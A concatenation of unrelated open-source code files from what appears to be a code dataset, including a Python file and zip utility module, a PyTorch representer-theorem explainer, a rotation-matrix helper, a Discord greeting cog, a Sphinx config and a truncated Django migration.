        return subDirs + plainFiles
def copyDir(src: str, dst: str, log: bool = True) -> int:
    """Recursively copy directory src into dst, creating directories as needed and
    overwriting existing files. Returns the number of files copied."""
    if src[-1] == os.path.sep:
        src = src[:-1]
    if dst[-1] != os.path.sep:
        dst = dst + os.sep
    srcLen = len(src)
    if not os.path.exists(dst):
        os.makedirs(dst)
    fileCount = 0
    for filePath, isDir, fileName, depth, remainCount in walkDir(src):
        # Rebase each source path under dst; directories are yielded before their
        # contents, so the target directory always exists when a file is copied.
        relativeName = filePath[srcLen + 1:]
        dstPath = dst + relativeName
        if isDir:
            if not os.path.exists(dstPath):
                os.makedirs(dstPath)
            if log:
                print(f'create dir: {dstPath}')
        else:
            shutil.copyfile(filePath, dstPath)  # dstPath's dir must exists, will over write dstPath if dstPath exists
            fileCount += 1
            if log:
                print(f'copy file {fileCount}: {dstPath}')
    # BUG FIX: the docstring promised the file count but the function returned None.
    return fileCount
def renameFilesInDir(src: str, find: str, replace: str, log: bool = True) -> int:
    """Rename every file under src whose name contains `find`, replacing it with
    `replace` (existing targets are overwritten). Returns the number of files renamed."""
    fileCount = 0
    for filePath, isDir, fileName, depth, remainCount in walkDir(src):
        if not isDir:
            newFileName = fileName.replace(find, replace)
            if fileName != newFileName:
                newFilePath = filePath[:len(filePath) - len(fileName)] + newFileName
                # os.rename fails on Windows if the target exists, so remove it first.
                if os.path.exists(newFilePath):
                    os.remove(newFilePath)
                os.rename(filePath, newFilePath)
                fileCount += 1
                if log:
                    print(f'{fileCount}: {filePath}\n  -> {newFilePath}, file renamed')
    # BUG FIX: the docstring promised the renamed-file count but the function returned None.
    return fileCount
def walkZip(zipPath: str, getFileObjCondition: Callable[[zipfile.ZipInfo], bool] = None) -> Iterator[Tuple[bool, zipfile.ZipInfo, zipfile.ZipExtFile]]:
    """
    Iterate a zip archive, yielding (isDir, zipInfo, fileObj) per entry.
    fileObj is an open ZipExtFile only for file entries accepted by
    getFileObjCondition(zipInfo) -> bool; it is valid only during that step.
    zipInfo.is_dir(), zipInfo.filename, ...
    """
    with zipfile.ZipFile(zipPath, 'r') as archive:
        for info in archive.infolist():
            if info.is_dir():
                yield True, info, None
                continue
            if getFileObjCondition and getFileObjCondition(info):
                with archive.open(info.filename, 'r') as member:
                    yield False, info, member
            else:
                yield False, info, None
def extractOneFileInZip(zipPath: str, dstDir: str, fileEnd: str, log: bool = True) -> bool:
    """
    Extract the first archive member whose name ends with fileEnd into dstDir,
    flattened to its base name. Returns True when a member was written.
    fileEnd: str.
    dstDir: str, should end with \\(not must).
    """
    if dstDir[-1] != os.sep:
        dstDir = dstDir + os.sep
    if not os.path.exists(dstDir):
        os.makedirs(dstDir)
    matches = lambda zInfo: zInfo.filename.endswith(fileEnd)
    for isDir, zipInfo, zipFile in walkZip(zipPath, matches):
        if not zipFile:
            continue
        dstPath = dstDir + os.path.basename(fileEnd)
        with open(dstPath, 'wb') as fout:
            shutil.copyfileobj(zipFile, fout)
        if log:
            print(f'copy file: {dstPath}')
        return True
    return False
def extractZip(zipPath: str, dstDir: str, subDir: str = None, log: bool = True) -> int:
    """
    Extract a zip archive into dstDir.
    subDir: str, if None, extract all contents to dstDir; if not None, only the tree
            below that archive sub directory is extracted (must not end with / and
            can not use \\ in subDir).
    dstDir: str, should end with \\(not must).
    returns int, files count.
    """
    if dstDir[-1] != os.sep:
        dstDir = dstDir + os.sep
    fileCount = 0
    if not subDir:
        for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: True):
            if isDir:
                dstPath = dstDir + zipInfo.filename
                if not os.path.exists(dstPath):
                    os.makedirs(dstPath)
                if log:
                    print(f'create dir: {dstPath}')
            else:
                dstPath = dstDir + zipInfo.filename
                with open(dstPath, 'wb') as fout:
                    shutil.copyfileobj(zipFile, fout)
                fileCount += 1
                if log:
                    print(f'copy file {fileCount}: {dstPath}')
        return fileCount
    foundDir = False
    # BUG FIX: the original passed an undefined name `checkFunc` here, raising
    # NameError as soon as subDir was given; every file entry must be opened.
    for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: True):
        if isDir:
            index = zipInfo.filename.find(subDir)
            if not foundDir and index >= 0:
                foundDir = True
            if foundDir:
                if index < 0:
                    # Past the wanted sub tree (entries are grouped): stop early.
                    break
                createDir = dstDir + zipInfo.filename[index + len(subDir) + 1:]
                if not os.path.exists(createDir):
                    os.makedirs(createDir)
                if log:
                    print(f'create dir: {createDir}')
        else:
            if zipFile:
                index = zipInfo.filename.find(subDir)
                dstPath = dstDir + zipInfo.filename[index + len(subDir) + 1:]
                with open(dstPath, 'wb') as fout:
                    shutil.copyfileobj(zipFile, fout)
                fileCount += 1
                if log:
                    print(f'copy file {fileCount}: {dstPath}')
            else:
                if foundDir:
                    break
    return fileCount
# def getLocalIP() -> str:
# ip = ''
# try:
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.connect(('8.8.8.8', 80))
# ip = s.getsockname()[0]
# finally:
# s.close()
# return ip
if __name__ == '__main__':
    # Simple smoke output when the module is executed directly.
    print(1, 2, 3)
| 36.027094 | 162 | 0.569768 | #!python3
# -*- coding: utf-8 -*-
# author: yinkaisheng@foxmail.com
import os
import sys
import json
import ctypes
import pickle
import shutil
# import socket
import zipfile
import datetime
from typing import Any, Callable, Iterator, Dict, List, Tuple
_SelfFileName = os.path.split(__file__)[1]
def isPy38OrHigher() -> bool:
    """Return True when the running interpreter is Python 3.8 or newer."""
    # Tuple comparison covers both the ==3.x-minor>=8 and the major>3 cases
    # of the original boolean expression.
    return sys.version_info[:2] >= (3, 8)
def printx(*values, sep: str = ' ', end: str = None, flush: bool = False, caller: bool = True) -> None:
    """print() wrapper that prefixes 'YYYY-MM-DD HH:MM:SS.mmm caller[line]:'.
    When caller is True, the nearest stack frame whose file is not this module
    supplies the function name and line number shown in the prefix."""
    t = datetime.datetime.now()
    if caller:
        frameCount = 1
        while True:
            frame = sys._getframe(frameCount)
            #_, scriptFileName = os.path.split(frame.f_code.co_filename)
            scriptFileName = os.path.basename(frame.f_code.co_filename)
            # walk outward until the frame belongs to a file other than this module
            if scriptFileName != _SelfFileName:
                break
            frameCount += 1
        timestr = f'{t.year}-{t.month:02}-{t.day:02} {t.hour:02}:{t.minute:02}:{t.second:02}.{t.microsecond // 1000:03} {frame.f_code.co_name}[{frame.f_lineno}]:'
    else:
        timestr = f'{t.year}-{t.month:02}-{t.day:02} {t.hour:02}:{t.minute:02}:{t.second:02}.{t.microsecond // 1000:03} :'
    print(timestr, *values, sep=sep, end=end)
    if flush and sys.stdout:
        sys.stdout.flush()
def setConsoleTitle(title: str) -> None:
    """Set the terminal window title via the ANSI OSC 2 escape sequence."""
    #need colorama.init
    sys.stdout.write(f'\x1b]2;{title}\x07')
def getStrBetween(src: str, left: str, right: str = None, start: int = 0, end: int = None) -> Tuple[str, int]:
    '''
    Return (substring, index); index is -1 when a required marker is not found.
    The substring lies between the markers left and right in src[start:end].
    A falsy left means "from the beginning"; a falsy right means "to the end".
    '''
    if left:
        s1start = src.find(left, start, end)
        if s1start < 0:
            return '', -1
        s1end = s1start + len(left)
        if not right:
            # No right marker requested: take everything after `left`.
            return src[s1end:], s1end
        s2start = src.find(right, s1end, end)
        if s2start < 0:
            return '', -1
        return src[s1end:s2start], s1end
    if right:
        # BUG FIX: the original called src.find(right, end), passing `end` as the
        # *start* position, so an explicit end was misused as the search origin.
        s2start = src.find(right, start, end)
        if s2start < 0:
            return '', -1
        return src[:s2start], 0
    return '', -1
def getFileText(path: str, encoding: str = 'utf-8', checkExist: bool = True) -> str:
    """Read a text file and return its contents; '' when checkExist is set and the
    path is missing. Undecodable bytes are silently dropped (errors='ignore')."""
    missing = checkExist and not os.path.exists(path)
    if missing:
        return ''
    with open(path, 'rt', encoding=encoding, errors='ignore') as handle:
        content = handle.read()
    return content
def writeTextFile(text: str, path: str, encoding: str = 'utf-8'):
    """Overwrite path with text using the given encoding (unencodable chars dropped)."""
    with open(path, 'wt', encoding=encoding, errors='ignore') as handle:
        handle.write(text)
def appendTextFile(text: str, path: str, encoding: str = 'utf-8'):
    """Append text to path, creating the file first when necessary."""
    with open(path, 'a+', encoding=encoding, errors='ignore') as handle:
        handle.write(text)
def pickleLoad(path: str) -> Any:
    """Unpickle and return the object stored at path; None when the file is absent."""
    if not os.path.exists(path):
        return
    with open(path, 'rb') as handle:
        return pickle.load(handle)
def pickleDump(obj: Any, path: str):
    """Pickle obj to path, overwriting any existing file."""
    with open(path, 'wb') as handle:
        pickle.dump(obj, handle)
def jsonFromFile(path: str, encoding: str = 'utf-8') -> Dict:
    """Parse the JSON file at path; an absent or empty file yields {}."""
    text = getFileText(path, encoding)
    if not text:
        return {}
    return json.loads(text)
def jsonToFile(jsonObj: Dict, path: str):
    """Pretty-print jsonObj (4-space indent, unescaped unicode, insertion-ordered
    keys) to path as UTF-8."""
    text = json.dumps(jsonObj, indent=4, ensure_ascii=False, sort_keys=False)
    writeTextFile(text, path, encoding='utf-8')
TreeNode = Any  # loose alias: any object may act as a tree node
def walkTree(root, getChildren: Callable[[TreeNode], List[TreeNode]] = None,
             getFirstChild: Callable[[TreeNode], TreeNode] = None, getNextSibling: Callable[[TreeNode], TreeNode] = None,
             yieldCondition: Callable[[TreeNode, int], bool] = None, includeRoot: bool = False, maxDepth: int = 0xFFFFFFFF) -> Iterator:
    """
    Walk a tree not using recursive algorithm.
    root: a tree node.
    getChildren: Callable[[TreeNode], List[TreeNode]], function(treeNode: TreeNode) -> List[TreeNode].
    getFirstChild: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
    getNextSibling: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
    yieldCondition: Callable[[TreeNode, int], bool], function(treeNode: TreeNode, depth: int) -> bool.
    includeRoot: bool, if True yield root first.
    maxDepth: int, enum depth.
    If getChildren is valid, ignore getFirstChild and getNextSibling,
    yield 3 items tuple: (treeNode, depth, remain children count in current depth).
    If getChildren is not valid, using getFirstChild and getNextSibling,
    yield 2 items tuple: (treeNode, depth).
    If yieldCondition is not None, only yield tree nodes that yieldCondition(treeNode: TreeNode, depth: int)->bool returns True.
    For example:
    def GetDirChildren(dir_):
        if os.path.isdir(dir_):
            return [os.path.join(dir_, it) for it in os.listdir(dir_)]
    for it, depth, leftCount in WalkTree('D:\\', getChildren= GetDirChildren):
        print(it, depth, leftCount)
    """
    if maxDepth <= 0:
        return
    depth = 0
    if getChildren:
        if includeRoot:
            if not yieldCondition or yieldCondition(root, 0):
                yield root, 0, 0
        children = getChildren(root)
        # childList is an explicit stack: childList[d] holds the not-yet-visited
        # nodes at depth d+1; `depth` indexes the top of the stack.
        childList = [children]
        while depth >= 0: # or while childList:
            lastItems = childList[-1]
            if lastItems:
                if not yieldCondition or yieldCondition(lastItems[0], depth + 1):
                    yield lastItems[0], depth + 1, len(lastItems) - 1
                if depth + 1 < maxDepth:
                    children = getChildren(lastItems[0])
                    if children:
                        # descend: push this node's children before finishing its siblings
                        depth += 1
                        childList.append(children)
                del lastItems[0]
            else:
                # current level exhausted: pop it and climb back to the parent level
                del childList[depth]
                depth -= 1
    elif getFirstChild and getNextSibling:
        if includeRoot:
            if not yieldCondition or yieldCondition(root, 0):
                yield root, 0
        child = getFirstChild(root)
        # childList[d] holds the next sibling still to be visited at depth d+1
        childList = [child]
        while depth >= 0: # or while childList:
            lastItem = childList[-1]
            if lastItem:
                if not yieldCondition or yieldCondition(lastItem, depth + 1):
                    yield lastItem, depth + 1
                child = getNextSibling(lastItem)
                childList[depth] = child
                if depth + 1 < maxDepth:
                    child = getFirstChild(lastItem)
                    if child:
                        depth += 1
                        childList.append(child)
            else:
                del childList[depth]
                depth -= 1
def listDir(path: Tuple[str, bool, str]) -> List[Tuple[str, bool, str]]:
    """Return the children of a (filePath, isDir, fileName) node for walkTree.

    Sub-directories are listed before plain files. For a file node an empty
    list is returned (previously this fell through and returned None, which
    contradicted the annotation; both values are falsy for walkTree, so the
    fix is backward compatible).
    """
    if not path[1]:  # file node: no children
        return []
    dirs = []
    plainFiles = []
    for name in os.listdir(path[0]):
        childPath = os.path.join(path[0], name)
        if os.path.isdir(childPath):
            dirs.append((childPath, True, name))
        else:
            plainFiles.append((childPath, False, name))
    return dirs + plainFiles
def walkDir(absDir: str, maxDepth: int = 0xFFFFFFFF) -> Iterator[Tuple[str, bool, str, int, int]]:
    """Yield (filePath, isDir, fileName, depth, remainCount) for every entry under `absDir`."""
    rootNode = (absDir, True, '')
    for node, depth, remainCount in walkTree(rootNode, getChildren=listDir, includeRoot=False, maxDepth=maxDepth):
        yield node[0], node[1], node[2], depth, remainCount
def copyFile(src: str, dst: str, log: bool = True) -> None:
    """Copy `src` to `dst`, creating missing destination directories.

    `dst` may be an existing directory, a path ending in a slash (treated as
    a directory), or a full file path.
    """
    if os.path.isdir(dst):
        dst = os.path.join(dst, os.path.basename(src))
    else:
        endsWithSep = dst[-1] == '\\' or dst[-1] == '/'
        if endsWithSep:
            dirPath = dst
            dst = dirPath + os.path.basename(src)
        else:
            dirPath = os.path.dirname(dst)
        if dirPath and not os.path.exists(dirPath):
            os.makedirs(dirPath)
    shutil.copyfile(src, dst)
    if log:
        print(f'copy file: {src}\n -> {dst}')
def copyDir(src: str, dst: str, log: bool = True) -> int:
    """Recursively copy the tree at `src` into `dst`.

    Directories are created as needed and existing destination files are
    overwritten. Returns the number of files copied.

    Fix: the docstring always promised a file count, but the function fell
    off the end and returned None; it now returns `fileCount`.
    """
    if src[-1] == os.path.sep:
        src = src[:-1]
    if dst[-1] != os.path.sep:
        dst = dst + os.sep
    srcLen = len(src)
    if not os.path.exists(dst):
        os.makedirs(dst)
    fileCount = 0
    for filePath, isDir, fileName, depth, remainCount in walkDir(src):
        # Path of this entry relative to src (skip the leading separator).
        relativeName = filePath[srcLen + 1:]
        dstPath = dst + relativeName
        if isDir:
            if not os.path.exists(dstPath):
                os.makedirs(dstPath)
            if log:
                print(f'create dir: {dstPath}')
        else:
            # dstPath's parent was created above: walkDir yields a directory
            # before descending into it.
            shutil.copyfile(filePath, dstPath)
            fileCount += 1
            if log:
                print(f'copy file {fileCount}: {dstPath}')
    return fileCount
def renameFilesInDir(src: str, find: str, replace: str, log: bool = True) -> int:
    """Rename every file under `src` whose name contains `find` to use `replace`.

    A pre-existing file at the new name is overwritten. Returns the number of
    files renamed.

    Fix: the docstring promised a count, but the function previously returned
    None; it now returns `fileCount`.
    """
    fileCount = 0
    for filePath, isDir, fileName, depth, remainCount in walkDir(src):
        if not isDir:
            newFileName = fileName.replace(find, replace)
            if fileName != newFileName:
                newFilePath = filePath[:len(filePath) - len(fileName)] + newFileName
                if os.path.exists(newFilePath):
                    # os.rename fails on Windows when the target exists.
                    os.remove(newFilePath)
                os.rename(filePath, newFilePath)
                fileCount += 1
                if log:
                    print(f'{fileCount}: {filePath}\n -> {newFilePath}, file renamed')
    return fileCount
def walkZip(zipPath: str, getFileObjCondition: Callable[[zipfile.ZipInfo], bool] = None) -> Iterator[Tuple[bool, zipfile.ZipInfo, zipfile.ZipExtFile]]:
    """Iterate over the entries of a zip archive.

    Yields (isDir, zipInfo, fileObj). `fileObj` is an open ZipExtFile only
    for file entries that satisfy `getFileObjCondition`; it is valid only
    until the generator advances (the member is closed afterwards).
    """
    with zipfile.ZipFile(zipPath, 'r') as archive:
        for info in archive.infolist():
            if info.is_dir():
                yield True, info, None
                continue
            wantFileObj = bool(getFileObjCondition) and getFileObjCondition(info)
            if wantFileObj:
                with archive.open(info.filename, 'r') as member:
                    yield False, info, member
            else:
                yield False, info, None
def extractOneFileInZip(zipPath: str, dstDir: str, fileEnd: str, log: bool = True) -> bool:
    """Extract the first archive member whose name ends with `fileEnd` into `dstDir`.

    `dstDir` is created if missing and need not end with a separator. Returns
    True when a matching member was extracted, False otherwise.
    """
    if dstDir[-1] != os.sep:
        dstDir = dstDir + os.sep
    if not os.path.exists(dstDir):
        os.makedirs(dstDir)
    for isDir, zipInfo, member in walkZip(zipPath, lambda zInfo: zInfo.filename.endswith(fileEnd)):
        if not member:
            continue
        # The extracted file is named after the tail of fileEnd, not the
        # member's full archive path.
        dstPath = dstDir + os.path.basename(fileEnd)
        with open(dstPath, 'wb') as fout:
            shutil.copyfileobj(member, fout)
        if log:
            print(f'copy file: {dstPath}')
        return True
    return False
def extractZip(zipPath: str, dstDir: str, subDir: str = None, log: bool = True) -> int:
    """
    Extract a zip archive into dstDir.
    subDir: str, if None, extract all contents to dstDir; if not None, only the
        subtree whose archive path contains subDir is extracted (paths are
        re-rooted below subDir). Must not end with / and can not use \\ in subDir.
    dstDir: str, should end with \\ (not mandatory; a separator is appended).
    returns int, files count.
    """
    if dstDir[-1] != os.sep:
        dstDir = dstDir + os.sep
    fileCount = 0
    if not subDir:
        # Full extraction: mirror every entry under dstDir.
        for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: True):
            if isDir:
                dstPath = dstDir + zipInfo.filename
                if not os.path.exists(dstPath):
                    os.makedirs(dstPath)
                    if log:
                        print(f'create dir: {dstPath}')
            else:
                dstPath = dstDir + zipInfo.filename
                with open(dstPath, 'wb') as fout:
                    shutil.copyfileobj(zipFile, fout)
                fileCount += 1
                if log:
                    print(f'copy file {fileCount}: {dstPath}')
        return fileCount
    # Partial extraction: only open members whose path contains subDir.
    def checkFunc(zipInfo: zipfile.ZipInfo) -> bool:
        return subDir in zipInfo.filename
    # foundDir flips to True at the first directory entry matching subDir;
    # entries are assumed contiguous, so a later non-match ends the scan early.
    foundDir = False
    for isDir, zipInfo, zipFile in walkZip(zipPath, checkFunc):
        if isDir:
            index = zipInfo.filename.find(subDir)
            if not foundDir and index >= 0:
                foundDir = True
            if foundDir:
                if index < 0:
                    break
                # Re-root the directory path below subDir (+1 skips the '/').
                createDir = dstDir + zipInfo.filename[index + len(subDir) + 1:]
                if not os.path.exists(createDir):
                    os.makedirs(createDir)
                    if log:
                        print(f'create dir: {createDir}')
        else:
            if zipFile:
                index = zipInfo.filename.find(subDir)
                dstPath = dstDir + zipInfo.filename[index + len(subDir) + 1:]
                with open(dstPath, 'wb') as fout:
                    shutil.copyfileobj(zipFile, fout)
                fileCount += 1
                if log:
                    print(f'copy file {fileCount}: {dstPath}')
            else:
                # Non-matching file after the subtree was seen: subtree done.
                if foundDir:
                    break
    return fileCount
def getDpiScale() -> float:
    """Return the Windows desktop DPI scale factor (physical px / logical px).

    Always returns 1 on non-Windows platforms.
    """
    if sys.platform == 'win32':
        user32 = ctypes.windll.user32
        gdi32 = ctypes.windll.gdi32
        dc = user32.GetDC(None)  # device context of the whole screen
        widthScale = gdi32.GetDeviceCaps(dc, 8)  # 8 = HORZRES: logical screen width
        # heightScale = gdi32.GetDeviceCaps(dc, 10)
        width = gdi32.GetDeviceCaps(dc, 118)  # 118 = DESKTOPHORZRES: physical screen width
        # height = gdi32.GetDeviceCaps(dc, 117)
        user32.ReleaseDC(None, dc)
        return width / widthScale
    return 1
# def getLocalIP() -> str:
# ip = ''
# try:
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.connect(('8.8.8.8', 80))
# ip = s.getsockname()[0]
# finally:
# s.close()
# return ip
def fileSize2Str(sizeInBytes: int) -> str:
    """Format a byte count as a human-readable string (GB / MB / KB / Bytes)."""
    gb = 1 << 30
    mb = 1 << 20
    kb = 1 << 10
    if sizeInBytes >= gb:
        return f'{sizeInBytes / gb:.2f} GB'
    if sizeInBytes >= mb:
        return f'{sizeInBytes / mb:.2f} MB'
    if sizeInBytes >= kb:
        return f'{sizeInBytes / kb:.2f} KB'
    # Singular form for 0 and 1.
    return f'{sizeInBytes} Bytes' if sizeInBytes > 1 else f'{sizeInBytes} Byte'
def getFileSizeStr(path: str) -> str:
    """Return the on-disk size of `path` as a human-readable string."""
    return fileSize2Str(os.path.getsize(path))
if __name__ == '__main__':
    # Ad-hoc smoke output when the module is executed directly.
    print(1, 2, 3)
| 3,773 | 0 | 372 |
ab2e2e05cac1d8b78c98df686d33b8380319786a | 2,482 | py | Python | explainers/representer.py | gmatt/Simplex | 787f01a83783835137819110a309b46dc66418db | [
"Apache-2.0"
] | 10 | 2021-11-01T02:32:04.000Z | 2022-01-27T17:24:06.000Z | explainers/representer.py | gmatt/Simplex | 787f01a83783835137819110a309b46dc66418db | [
"Apache-2.0"
] | 1 | 2022-01-06T20:18:15.000Z | 2022-01-28T14:13:44.000Z | explainers/representer.py | gmatt/Simplex | 787f01a83783835137819110a309b46dc66418db | [
"Apache-2.0"
] | 6 | 2021-11-23T03:08:25.000Z | 2022-02-22T03:02:34.000Z | import torch
| 42.793103 | 120 | 0.680902 | import torch
class Representer:
    """Post-hoc explainer based on the representer theorem.

    Each test prediction is approximated as a sum of per-corpus-example
    contributions alpha_i * <h(x_test), h(x_i)>, where h is the latent
    representation and alpha_i is derived from the training residual.
    """
    def __init__(self, corpus_latent_reps: torch.Tensor, corpus_probas: torch.Tensor, corpus_true_classes: torch.Tensor,
                 reg_factor: float) -> None:
        """
        Initialize a representer theorem explainer.
        :param corpus_latent_reps: corpus latent representations, shape (corpus, latent)
        :param corpus_probas: black-box probabilities for the corpus, shape (corpus, classes)
        :param corpus_true_classes: one-hot true classes of the corpus examples
        :param reg_factor: weight decay factor used when training the black-box
        """
        self.corpus_latent_reps = corpus_latent_reps
        self.corpus_probas = corpus_probas
        self.corpus_true_classes = corpus_true_classes
        self.reg_factor = reg_factor
        corpus_shape = corpus_latent_reps.shape
        self.corpus_size = corpus_shape[0]
        self.dim_latent = corpus_shape[1]
        self.num_classes = corpus_probas.shape[-1]
        # Populated by fit().
        self.test_latent_reps = None
        self.test_size = None
        self.weights = None
    def fit(self, test_latent_reps: torch.Tensor) -> None:
        """
        Fit the explainer on test examples.
        :param test_latent_reps: test latent representations, shape (test, latent)
        :return:
        """
        self.test_latent_reps = test_latent_reps
        self.test_size = test_latent_reps.shape[0]
        # Inner products between every test and corpus representation: (test, corpus, 1).
        inner_products = test_latent_reps @ self.corpus_latent_reps.t()
        inner_products = inner_products.unsqueeze(-1)
        # Residual-based coefficients: (1, corpus, classes).
        residuals = self.corpus_true_classes - self.corpus_probas
        alpha = residuals / (2 * self.reg_factor * self.corpus_size)
        alpha = alpha.unsqueeze(0)
        self.weights = alpha * inner_products
    def output_approx(self) -> torch.Tensor:
        """
        Return the representer approximation of the test outputs, shape (test, classes).
        :return:
        """
        return self.weights.sum(dim=1)
    def to(self, device: torch.device) -> None:
        """
        Move all stored tensors to `device` (call only after fit()).
        :param device: target device
        :return:
        """
        self.corpus_latent_reps = self.corpus_latent_reps.to(device)
        self.corpus_probas = self.corpus_probas.to(device)
        self.corpus_true_classes = self.corpus_true_classes.to(device)
        self.test_latent_reps = self.test_latent_reps.to(device)
        self.weights = self.weights.to(device)
| 0 | 2,445 | 23 |
bde34ca3526e7f51ff2fa0a0e40bdfa61e94305e | 1,097 | py | Python | src/psiz/utils/rotation_matrix.py | greenfieldvision/psiz | 37068530a78e08792e827ee55cf55e627add115e | [
"Apache-2.0"
] | 21 | 2020-04-03T21:10:05.000Z | 2021-12-02T01:31:11.000Z | src/psiz/utils/rotation_matrix.py | greenfieldvision/psiz | 37068530a78e08792e827ee55cf55e627add115e | [
"Apache-2.0"
] | 14 | 2020-04-10T00:48:02.000Z | 2021-05-25T18:06:55.000Z | psiz/utils/rotation_matrix.py | rgerkin/psiz | d540738462b6436a08a472d5e349ca2b813e6d47 | [
"Apache-2.0"
] | 4 | 2020-10-13T16:46:14.000Z | 2021-11-10T00:08:47.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 The PsiZ Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Module of utility functions.
Functions:
rotation_matrix: Returns a two-dimensional rotation matrix.
"""
import numpy as np
def rotation_matrix(theta):
    """Return the 2x2 counter-clockwise rotation matrix for `theta` radians.

    Arguments:
        theta: Scalar value indicating radians of rotation.
    """
    cos_t = np.cos(theta)
    sin_t = np.sin(theta)
    return np.array([[cos_t, -sin_t],
                     [sin_t, cos_t]])
| 29.648649 | 78 | 0.655424 | # -*- coding: utf-8 -*-
# Copyright 2020 The PsiZ Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Module of utility functions.
Functions:
rotation_matrix: Returns a two-dimensional rotation matrix.
"""
import numpy as np
def rotation_matrix(theta):
"""Return 2D rotation matrix.
Arguments:
theta: Scalar value indicating radians of rotation.
"""
return np.array((
(np.cos(theta), -np.sin(theta)),
(np.sin(theta), np.cos(theta)),
))
| 0 | 0 | 0 |
0bbeffa00ad38c43587387598ac50be666e90d9a | 462 | py | Python | discordCommands/hello.py | asoji/Yiski | 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | [
"MIT"
] | null | null | null | discordCommands/hello.py | asoji/Yiski | 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | [
"MIT"
] | 11 | 2022-01-27T08:02:41.000Z | 2022-02-10T23:32:29.000Z | discordCommands/hello.py | asoji/Yiski | 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | [
"MIT"
] | 1 | 2022-01-27T06:11:48.000Z | 2022-01-27T06:11:48.000Z | from discord.ext import commands
from loguru import logger
from mainDiscord import embedCreator
| 25.666667 | 111 | 0.712121 | from discord.ext import commands
from loguru import logger
from mainDiscord import embedCreator
class HelloDiscord(commands.Cog):
    """Cog exposing a single `hello` greeting command."""
    def __init__(self, client):
        # Bot instance this cog is registered on.
        self.client = client
    @commands.command()
    async def hello(self, ctx):
        # Reply with a green (0x00ff00) embed mentioning the invoking user.
        await ctx.send(embed=embedCreator("Hello World!", f"& Howdy Nerd, aka {ctx.author.mention}", 0x00ff00))
def setup(client):
    """Extension entry point invoked by discord.py when this module is loaded."""
    client.add_cog(HelloDiscord(client))
    logger.debug("Hello Cog loaded.")
| 229 | 89 | 46 |
a3b12a22896d70cbbefc9e7e1dafb2be8fc7279c | 78 | py | Python | tests/roots/test-maxlistdepth/conf.py | samdoran/sphinx | 4c91c038b220d07bbdfe0c1680af42fe897f342c | [
"BSD-2-Clause"
] | 4,973 | 2015-01-03T15:44:00.000Z | 2022-03-31T03:11:51.000Z | tests/roots/test-maxlistdepth/conf.py | samdoran/sphinx | 4c91c038b220d07bbdfe0c1680af42fe897f342c | [
"BSD-2-Clause"
] | 7,850 | 2015-01-02T08:09:25.000Z | 2022-03-31T18:57:40.000Z | tests/roots/test-maxlistdepth/conf.py | samdoran/sphinx | 4c91c038b220d07bbdfe0c1680af42fe897f342c | [
"BSD-2-Clause"
] | 2,179 | 2015-01-03T15:26:53.000Z | 2022-03-31T12:22:44.000Z | exclude_patterns = ['_build']
latex_elements = {
'maxlistdepth': '10',
}
| 13 | 29 | 0.641026 | exclude_patterns = ['_build']
latex_elements = {
'maxlistdepth': '10',
}
| 0 | 0 | 0 |
acdf93786f95a7945c8913e5d9f8076e4683bcb1 | 2,174 | py | Python | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | null | null | null | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 16 | 2020-03-11T08:25:46.000Z | 2022-03-02T08:14:40.000Z | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 9 | 2020-01-30T17:37:38.000Z | 2021-09-30T02:22:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-07-11 04:08
from __future__ import unicode_literals
from django.db import migrations, models
| 32.939394 | 73 | 0.587856 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-07-11 04:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add apiary-site detail columns to ApiarySiteOnApproval:
    two approval milestone dates, a DRA permit flag, and several optional
    40-character free-text descriptors."""
    dependencies = [
        ('disturbance', '0266_auto_20210708_1640'),
    ]
    operations = [
        # Approval milestone dates.
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='approval_cpc_date',
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='approval_minister_date',
            field=models.DateField(blank=True, null=True),
        ),
        # Optional 40-character descriptors.
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='batch_no',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='catchment',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='cog',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        # DRA permit flag; existing rows default to False.
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='dra_permit',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
